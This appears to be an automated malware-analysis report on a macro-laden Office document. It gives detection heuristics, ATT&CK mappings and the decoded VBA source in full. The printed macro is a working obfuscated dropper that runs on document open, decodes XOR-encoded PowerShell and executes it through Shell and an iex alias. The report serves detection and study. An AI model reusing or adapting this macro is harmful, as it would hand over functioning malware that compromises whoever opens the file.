Verdict: MALICIOUS
Risk Score: 222
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro that runs automatically when the document is opened (Document_Open). The macro assembles a command line at runtime from concatenated string fragments and Chr() values and passes it to VBA.Shell(), so the executed command is not visible in the source; this indicates dropper or downloader functionality. The ClamAV heuristic also identifies the file as 'Doc.Dropper.Agent-6592561-0', reinforcing its role as a malware dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6592561-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6592561-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script:
  `jMinqP = CDbl(UKqERJ) qYECDJVzi = dwakitU + VBA.Shell(nYikFiCo + Chr(KYOXisO + vbKeyP + jiQXDKVPj) + "owers" + hUMrYzk + DQhSDljvmoR + KhzDtEKMFr + UaQapXtui, 17010 - 17010) RVsGl = jJjVq`
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script:
  `End Function Private Sub Document_open() On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11913 bytes |

SHA-256 (macros.bas): 806b6ac6a9f6e95cd33bcc11b732cfcce821a6a0f864f212b35d9340434eda1e
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "HrotVrdd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qYECDJVzi()
On Error Resume Next
rdSYFj = MUzvuD
ajLInv = Tan(71383)
mUzbOz = CDbl(zZnohW * CDbl(jfGzN + Int(PNrIDU * Rnd(75886)) * YPMOl * Log(82358 * rKLjnq - EfkXKR + Fix(51))))
prwjRT = Tan(48743)
UuQavX = LYfKW
oXuKob = CDbl(aavfT)
OWomd = QvFKc
iYOhU = Tan(44741)
wlVzhG = CDbl(vQRQr * CDbl(nQtkLs + Int(IvdwFi * Rnd(93319)) * HNGODf * Log(46009 * Najawb - zFwCp + Fix(51))))
WKtRBV = Tan(4702)
fKiScj = jsJcGI
WrDKc = CDbl(DKCoEP)
jdQVnD = DHzZGq
DNwBKV = Tan(59719)
OzYoN = CDbl(ihbDTD * CDbl(zFmuu + Int(pbBBHt * Rnd(72338)) * oCijBu * Log(5784 * zdVIEL - CMBkD + Fix(51))))
wUDfGB = Tan(47607)
IJZmud = zoFJiG
zRvbf = CDbl(fwWSJz)
LZjZVV = qjbGp
haBvsi = Tan(72633)
KitMXw = CDbl(IMmtZ * CDbl(zVUXQS + Int(JzzFV * Rnd(15943)) * twVib * Log(31706 * XwIiV - Yqznmz + Fix(51))))
XkVMK = Tan(75980)
aYMovn = SwMSWm
jMinqP = CDbl(UKqERJ)
qYECDJVzi = dwakitU + VBA.Shell(nYikFiCo + Chr(KYOXisO + vbKeyP + jiQXDKVPj) + "owers" + hUMrYzk + DQhSDljvmoR + KhzDtEKMFr + UaQapXtui, 17010 - 17010)
RVsGl = jJjVq
JcIXoo = Tan(40134)
zLJYP = CDbl(nNOSU * CDbl(cNLhh + Int(dUdQHr * Rnd(91225)) * Blmodz * Log(61530 * jzTkH - AHvzAY + Fix(51))))
XswcCr = Tan(41091)
iNOwZ = UWUHqW
hESdaw = CDbl(bZpXn)
WBtBH = pzfVJd
dtnMa = Tan(10585)
Qtikfd = CDbl(BWMwb * CDbl(OUIoN + Int(RdrcU * Rnd(24534)) * rzUrww * Log(24351 * vkOChz - JzozZ + Fix(51))))
SUqqI = Tan(90285)
UTkum = QOTroX
HYQKY = CDbl(lCjfOw)
End Function
Private Sub Document_open()
On Error Resume Next
iXTDd = MAcTaw
oZfiAq = Tan(6159)
jzjwE = CDbl(dznjcn * CDbl(ALXCfX + Int(OqwRqI * Rnd(76237)) * OqXNY * Log(56051 * avhwN - CqqrQ + Fix(51))))
rBdaoC = Tan(7154)
rlbUi = VLzFZ
pDSGvo = CDbl(iwIOP)
hTWdb = YzUuh
PvDlQi = Tan(21419)
AlAPBG = CDbl(shjqz * CDbl(fjtWzj + Int(DuaYO * Rnd(95510)) * ilWrFY * Log(95333 * dvnjK - SmzcZk + Fix(51))))
UfdWNH = Tan(47576)
FCziNW = kIcvoM
LbBEN = CDbl(GLskY)
qYECDJVzi
STlfz = LaFsA
OFsVsR = Tan(47764)
pRiuIr = CDbl(nzjjM * CDbl(PJBSWs + Int(Wljdz * Rnd(66524)) * rZhWC * Log(77241 * HwXwM - GkWjn + Fix(51))))
nhwKI = Tan(67060)
YUIMdU = rBlPA
sTDhE = CDbl(aSSOQM)
vCDPT = mioWG
XurvOZ = Tan(75936)
JASYk = CDbl(oYIrio * CDbl(NZfaXA + Int(ZadSEz * Rnd(20468)) * XJNPJ * Log(58379 * WbSLhl - uDUPh + Fix(51))))
bHIQV = Tan(28961)
jCDHL = GKjZz
jXAUnV = CDbl(AziTf)
End Sub
Attribute VB_Name = "PEqQAwtuhzzaw"
Function hUMrYzk()
On Error Resume Next
uzdHU = Tan(8539)
zWCfCa = Tan(49319)
MwZqzs = XOmED
iKNrkW = CDbl(njhtJr * CDbl(KPdQwE + Int(jKFZR * Rnd(59846)) * qCAOr * Log(19622 * MpnSD - sSYBVD + Fix(51))))
CzHST = CDbl(KwihfS)
wGvivw = OGXQI
VdBJTOLqVYh = "HeLL (" + "'30t92C83F12" + "0%92K1" + "20t2" + "6A7K2" + "6t84C" + "95m77F23C8"
tizpi = Tan(4230)
KiqZs = Tan(88863)
ONjzp = FSiGX
VIvZm = CDbl(bqznN * CDbl(OFhjG + Int(olfuz * Rnd(73556)) * Vwjjca * Log(91450 * ArBjQm - Swnazi + Fix(51))))
YbKJiR = CDbl(vGWMR)
nOMiUz = fvnqW
YlzKHawhzB = "5m88u80A95<" + "89" + "F78G26m72m91" + "%84m9" + "4F85G87C1u" + "30F119C" + "64A74G98A78G26" + "K7t26A84m95u77u" + "23t85%88m80" + "K95u89F78F26A10"
OTSiT = Tan(64524)
NPECjn = Tan(85868)
Qchop = qcuzBn
JrjzCz = CDbl(zSpUn * CDbl(UBFsW + Int(UYYmzq * Rnd(44393)) * zjusq * Log(18850 * EYYEh - dwimvC + Fix(51))))
JkFjHf = CDbl(RQXzid)
wcQqZi = YXpQN
iwCzlFMfKL = "5A67%73G78" + "A95%87K20K116" + "F95G78t" + "20t109m9" + "5m88<" + "121C86m83<" + "95u84G78K1F3" + "0K83C112K94m121"
rsZcwR = Tan(92002)
siNPZ = Tan(16533)
iGAai = zzHTuk
Zmzrl = CDbl(dlChpF * CDbl(ULBnDI + Int(VNVzI * Rnd(84423)) * mBiwoK * Log(68670 * humcZ - WNOdOH + Fix(51))))
QAitz = CDbl(kYlBvw)
vTTpz = tMfGp
jIBszarD = "G89G26m7<26F2" + "9G82%78u7" + "8<74m0<2" + "1<21G83K95m86C" + "95<78m" + "72F8" + "5<84m20G89<"
oGLWM = Tan(33044)
uJETq = Tan(86964)
LiuPDo = kzTOIw
XMlZB = CDbl(owMJh * CDbl(JlzaTR + Int(BKDOL * Rnd(92023)) * JZMJdq * Log(53370 * qhXfSb - rpGNQ + Fix(51))))
zTwZd = CDbl(GPkDf)
CQuEiZ = mpdcT
ZSsAoizdVb = "85t87C21%67G8" + "9A" + "111" + "C11"
jtWVM = Tan(13243)
TUSAnR = Tan(49319)
YOKVs = JXKKE
ErtrI = CDbl(NhUfEq * CDbl(wqlwjP + Int(QBGXf * Rnd(10277)) * qPHMdh * Log(51405 * bbbrFE - qwStVD + Fix(51))))
kWLDw = CDbl(RMTbI)
bXjzC = UpGla
ZwoIINZ = "3C1" + "5K118" + "G21<122" + "K82C78K" + "78%74%0t" + "21G21K77F77G77" + "C20K" + "85t87"
pUuipf = Tan(98517)
jiXjNp = Tan(14041)
EXFLfi = SXWwX
UfEZYi = CDbl(DitaR * CDbl(UOzlw + Int(UohBXF * Rnd(10851)) * Bazjh * Log(24603 * OCTHp - wRkdQ + Fix(51))))
wnihU = CDbl(bJclM)
TWrFP = Jiadcr
qnjHBFFji = "<79C7" + "2t" + "87<91" + "t81F83G84C91" + "u20A84G9" + "5G7"
TsjDUF = Tan(22399)
RPjGs = Tan(14805)
FWfvh = JZkwWh
XiSOj = CDbl(KWjzZ * CDbl(GaCCrD + Int(iLLPRf * Rnd(76769)) * rmjliz * Log(13585 * jzVXow - BphjRL + Fix(51))))
BjvJT = CDbl(zOquzq)
ipGaX = mWjmoz
TNLqjLwi = "8m21F9" + "8<13t105%64C1" + "05<" + "89<88C21u1" + "22m82K7" + "8A78" + "C74F" + "0G21A21K1"
hUMrYzk = VdBJTOLqVYh + YlzKHawhzB + iwCzlFMfKL + jIBszarD + ZSsAoizdVb + ZwoIINZ + qnjHBFFji + TNLqjLwi
End Function
Function DQhSDljvmoR()
On Error Resume Next
iwPiW = Tan(39305)
SrBic = Tan(2673)
WNkOp = Wwfilz
ROVDI = CDbl(ZBsRnY * CDbl(MRGMMS + Int(SCJkDQ * Rnd(6638)) * FwtHDM * Log(80250 * VzWob - XiwDC + Fix(51))))
OElAr = CDbl(pwuXfU)
Qwlci = vEbqoS
IWzYPs = "5K14" + "A81K84A" + "81C20G72%79G" + "21<" + "15K10u121A10" + "6%77<120K64" + "<21A122C82" + "C78u78u74m"
QzYziA = Tan(5974)
lGGiP = Tan(70950)
fhDAAD = RUHSjo
nvRNBo = CDbl(wFjaAA * CDbl(wjqMIu + Int(FvNBQK * Rnd(47746)) * XCXSRa * Log(81355 * sharlE - YjwCGD + Fix(51))))
kiUOh = CDbl(DhjBIt)
Kbzjzf = mZcHT
AcbwR = "0u21t21t77<7" + "7K77K2" + "0<87K85u78m85" + "<67u91C64K94t2"
wrfBT = Tan(4902)
YuTsqm = Tan(62189)
OtzYj = BMKozb
RVzhwO = CDbl(PWBitu * CDbl(nPISHR + Int(lfddsT * Rnd(31146)) * HUWDB * Log(12741 * WLtXl - ZVoiQr + Fix(51))))
pTEEvi = CDbl(PjLpt)
wXWXLV = MAzJl
ijnXwowU = "0t83A72G2" + "1K64%76G108u" + "107%2" + "1%122F8" + "2<78<78G74K0C21" + "<21G78K72G" + "95" + "F76A85u"
MJfdJ = Tan(94187)
BLPoUk = Tan(97545)
vYJan = KnJwqZ
ADtHR = CDbl(BTffFc * CDbl(cvArq + Int(uziqr * Rnd(68864)) * XbCVM * Log(19513 * JBIVh - vzHEX + Fix(51))))
jdVVMC = CDbl(KQZQJ)
jCGocH = JocoX
vwIiLwiJNa = "72G89t82" + "G72m83C73K78t95" + "%84t73%95t" + "84m20K89t85K8" + "7G21m92G81F105A" + "13K83<124K11F" + "21"
HzUJLk = Tan(82705)
qXzsw = Tan(87913)
kTHzR = CMKoD
EFozEq = CDbl(mwajiv * CDbl(LzNYaW + Int(sVzVur * Rnd(21030)) * vdYziO * Log(71576 * znHOlb - uJkCHK + Fix(51))))
KzTnCw = CDbl(fRfaQ)
aaboj = TKsfYq
HdSaJ = "t29m20A" + "105t74F86" + "%83F" + "78C18u29K12" + "2u29C19A1<30A9" + "1m113G127G104A1"
cEdWtH = Tan(43063)
QWafUC = Tan(2058)
alhlVm = udQiC
PWdMJu = CDbl(oRzKQ * CDbl(mahAwd + Int(XwGMM * Rnd(3548)) * TPirSW * Log(89496 * zwTKH - DBdwiz + Fix(51))))
PRzIC = CDbl(ZjIsuE)
TdHuwY = mdSWh
ZumBO = "08A99F26t7" + "m26" + "<3" + "0<92t83%120" + "F92u12" + "0%2" + "0<84C95t6" + "6m78G18A11" + "K22<26G15A1"
DQhSDljvmoR = IWzYPs + AcbwR + ijnXwowU + vwIiLwiJNa + HdSaJ + ZumBO
End Function
Function KhzDtEKMFr()
On Error Resume Next
zJmOn = Tan(63810)
qKFUZ = Tan(27627)
RwrOXV = SmJuu
vABTwk = CDbl(UBYmB * CDbl(FwEOi + Int(TjfErG * Rnd(25968)) * PvqdIM * Log(97822 * FprIj - tWJzd + Fix(51))))
DPwJMi = CDbl(IYLvi)
hjiTC = qdRUD
XBvPdmQUW = "1<10t1" + "1t9m3G19F1K30%" + "120<87%117%73F" + "112F87F26%" + "7%26m30t9" + "5K84G76G0C"
RrFaI = Tan(30428)
KlGJbp = Tan(52308)
wdNdAi = ErVbR
wSXrSd = CDbl(QFBPi * CDbl(QBPkF + Int(NWGii * Rnd(85389)) * WZRzjb * Log(80000 * noljX - JilHQw + Fix(51))))
OrjpzW = CDbl(szGUn)
vrIjfa = sUKOSn
KmWDWjwJX = "78m95<87m7" + "4G26<17%26C" + "29K102K29t2" + "6A17C26G30G91" + "m113" + "<127t104K108" + "%9"
FszpAZ = Tan(29643)
tEiLYY = Tan(22427)
FDjwbk = ILIhKZ
CDndca = CDbl(KVWWIX * CDbl(dCKnh + Int(cdnhIh * Rnd(29423)) * OnMppo * Log(87188 * QEjwwA - oYwYhX + Fix(51))))
UvLsw = CDbl(KjSjJn)
KvEwk = qQffm
VBruYajs = "9%26" + "C17u26<29G20" + "F95A66<95%29K1" + "u92K" + "85G72<95t91C89%" + "82C18<30A91" + "F109u"
KsjWc = Tan(58034)
TsznUa = Tan(21006)
KKhJB = vNnTo
NrZoPz = CDbl(mdhWz * CDbl(oTvpMa + Int(PwsWY * Rnd(42458)) * iTIbW * Log(65100 * iIOfKN - BJYiLn + Fix(51))))
QzCQt = CDbl(aSUGzS)
onGELd = doYjDA
YzWYcZpLc = "64" + "<80G96%77" + "u26G83%84<2" + "6<30<83K112A94t" + "121A89G19m65<7" + "8A72F67A65A30K1" + "19m64u74G98" + "%78K" + "20A126u85A77"
GOzqt = Tan(32344)
iNYaZ = Tan(8693)
DzicuS = tMLYZi
tbtzLZ = CDbl(QjLdf * CDbl(DKSCr + Int(BFOFwB * Rnd(43064)) * kfuizA * Log(11344 * HUYPA - iUtkdw + Fix(51))))
fVwzof = CDbl(kojdiI)
DFNJLP = hAioS
XqCUNUoLwnY = "K84A86<85u" + "91F94C12" + "4G83<86G9" + "5t18t30G91F1" + "09K64u80G96K7" + "7C20C110<8" + "5%105%78m72" + "t83t84G93C18m19" + "u22%26m"
TiDIjk = Tan(82025)
QzoFkc = Tan(77339)
NTRJE = qnBqAZ
TOzwB = CDbl(JlZPwG * CDbl(qsYuf + Int(SaDBZS * Rnd(65999)) * zEZkF * Log(51254 * dZGlbC - mBLYsY + Fix(51))))
MZjTX = CDbl(jzirf)
XaaVzt = MGwocD
VwvrSuRFwEA = "30F12" + "0u87K117" + "t73A112C87C1" + "9u1K105K78C91m" + "72K78C23%" + "106F72A85<89F9" + "5K73u73A26u" + "30G1" + "20F87%117" + "A73K112A87G1C8"
fovXiP = Tan(43768)
YfWVc = Tan(48937)
DwFDi = uFBPdF
cAQuE = CDbl(uCOWYG * CDbl(zdKiC + Int(qLAGl * Rnd(8210)) * NYiAJT * Log(24890 * wfFbX - vFwqHw + Fix(51))))
bufqIa = CDbl(UOMFt)
INNjFI = SFBjhM
hPliMHUEV = "8u72A" + "95m91u81C1F7" + "1u89" + "%91A" + "78<89t82<65m77"
ETmDz = Tan(92777)
ikmdfE = Tan(81122)
ckGmrk = BjoOpI
ubppU = CDbl(jblafC * CDbl(Ksmilh + Int(DqjOf * Rnd(35127)) * UVURl * Log(50707 * DGuzIf - ObtFX + Fix(51))))
CEsbK = CDbl(jPFRJ)
UkZkP = ZlkdC
Aikkadwh = "C72K83A" + "78G95G23u8" + "2C85A73C78F26" + "C30K1"
JKzkXX = Tan(81646)
SKAiR = Tan(34602)
lwVojL = jzwJzD
uPzhv = CDbl(WuUNp * CDbl(SCjYO + Int(zrEDn * Rnd(14472)) * ZwVFb * Log(62261 * EzNDM - nzvuD + Fix(51))))
LtGrbq = CDbl(WTBps)
YzzNSm = wEIKk
lZOcRrw = "01t20A127G66G89" + "K95C74u78A8" + "3<85K84t20" + "C119%95<73A73m9"
UaowD = Tan(32360)
OZOzhl = Tan(90299)
CnzlRt = ZkpCL
LivrL = CDbl(CLzzrY * CDbl(uzFEHH + Int(tniTFp * Rnd(69257)) * TDEoA * Log(49792 * uSGWp - jOtdCd + Fix(51))))
YAclWL = CDbl(susDYS)
LqVbWK = jtFKC
EdjBt = "1u93K95" + "G1<71<71'-sPLi" + "T'F" + "'-sPLI" + "t '<'-splIT" + " '"
KhzDtEKMFr = XBvPdmQUW + KmWDWjwJX + VBruYajs + YzWYcZpLc + XqCUNUoLwnY + VwvrSuRFwEA + hPliMHUEV + Aikkadwh + lZOcRrw + EdjBt
End Function
Function UaQapXtui()
On Error Resume Next
mVooOI = Tan(78859)
zsOGl = Tan(67956)
HuHsSd = jcuswB
YRnqM = CDbl(XRzPnj * CDbl(smzfm + Int(pXNIw * Rnd(56613)) * nkYFkO * Log(46685 * ufFXt - LdifCk + Fix(51))))
LJqNaw = CDbl(tuiYLJ)
iuqUzi = oTAai
MmjozAFw = "%'-S" + "plit'a' -S" + "PL" + "iT 'm' -SPlIT '" + "T'-spLIt 'k'"
BaGrK = Tan(95692)
kQVFj = Tan(25440)
kXTtI = EcHwM
ujVqL = CDbl(chwUiz * CDbl(JdITb + Int(OlfzZR * Rnd(8443)) * zcPSR * Log(24242 * pkAOX - GoSpo + Fix(51))))
acOivZ = CDbl(icEjC)
VOKSBY = jAiZfo
XlOYwE = "-sPliT'g'-s" + "PLiT'" + "u' -SPlI" + "T'C'" + "|F" + "oReaCH-objEC" + "T{[CH" + "AR] ($_-bXOr"
btdMl = Tan(88848)
kNDjt = Tan(70679)
SbFBRi = DScFA
mncTdH = CDbl(iGtFS * CDbl(CaKLDz + Int(Ubhdwz * Rnd(85408)) * DOordN * Log(51340 * IuZcj - wbdTr + Fix(51))))
KGwUd = CDbl(VirFO)
UjmXa = EpQki
wbHmTbNjT = Chr(34) + "0x3a" + Chr(34) + ")" + " }) -jOiN''|&" + " ( $EnV:ComSpE" + "C[4,15,25]-JOin"
EBAsH = Tan(44959)
HTPJkb = Tan(11799)
nYLCik = NVcdf
ZzVrMi = CDbl(qzhAw * CDbl(VvFUGd + Int(GVLrr * Rnd(83555)) * JtvVjl * Log(1882 * WuSYtr - ziNLja + Fix(51))))
liAVA = CDbl(zCLRN)
zQOKZw = KWGWP
UzsOXpjAo = "'')"
UaQapXtui = MmjozAFw + XlOYwE + wbHmTbNjT + UzsOXpjAo
End Function